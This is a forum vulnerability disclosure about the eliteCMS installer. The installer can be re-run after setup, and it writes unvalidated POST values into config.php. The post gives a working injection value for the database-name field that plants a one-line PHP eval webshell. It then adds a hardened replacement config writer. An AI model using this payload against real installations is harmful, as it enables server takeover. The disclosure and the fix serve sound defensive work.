China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: eliteCMS installer not locked after installation + one-line webshell write vulnerability

Author: admin    Time: 2012-11-18 13:59
The eliteCMS installer is not locked after installation completes, so an attacker can re-run the installation by visiting the installer's URL.

Another vulnerability is that the installer can write a one-line webshell directly into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
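As an added example, not eliteCMS's own code, here is a hardened replacement for the step-4 config writer that addresses both findings: it refuses to run once an install lock file exists, restricts the identifier fields to the characters a MySQL host, database or user name can contain, and emits every value with var_export() so a submitted value cannot close the string literal or leave PHP mode. The lock-file name, the temp-file path and the regexes are assumptions; the mysql_connect block the original appends is left out to keep the example focused on the define() lines.

```php
<?php
// Added example, not eliteCMS code: a hardened step-4 config writer.
// Lock-file name, temp path and the identifier regexes are assumptions.
// Refuse to run the installer again once installation has completed.
function assert_not_installed(string $lockFile): void {
    if (file_exists($lockFile)) {
        http_response_code(403);
        exit('Installer is locked; remove the lock file on the server to reinstall.');
    }
}
// Accept only the expected keys, as strings, and restrict the identifiers to
// characters a MySQL host name, database name or user name can contain.
function validate_db_settings(array $post): array {
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9._:-]{1,255}$/',
        'DB_NAME'   => '/^[A-Za-z0-9_$]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.@-]{1,32}$/',
        'DB_PASS'   => null, // any string; the quoting below keeps it inert
    ];
    $out = [];
    foreach ($rules as $key => $re) {
        if (!isset($post[$key]) || !is_string($post[$key])) {
            throw new InvalidArgumentException("$key is required");
        }
        if ($re !== null && !preg_match($re, $post[$key])) {
            throw new InvalidArgumentException("$key contains invalid characters");
        }
        $out[$key] = $post[$key];
    }
    return $out;
}
// var_export() emits a properly quoted PHP literal, so a quote or ?> inside a
// value stays inside the string and cannot close it or leave PHP mode.
function render_config(array $settings): string {
    $lines = ['<?php'];
    foreach ($settings as $k => $v) {
        $lines[] = sprintf('define(%s, %s);', var_export($k, true), var_export($v, true));
    }
    return implode("\n", $lines) . "\n";
}
function write_config(string $file, string $lockFile, array $post): void {
    assert_not_installed($lockFile);
    $settings = validate_db_settings($post);
    $tmp = $file . '.tmp'; // write atomically, then lock the installer
    if (file_put_contents($tmp, render_config($settings), LOCK_EX) === false || !rename($tmp, $file)) {
        throw new RuntimeException('Could not write config.php');
    }
    file_put_contents($lockFile, date('c'));
}
```

With these checks the POST body shown above is rejected at validate_db_settings(), and even a value that passes validation is written as an escaped literal rather than pasted into the file verbatim.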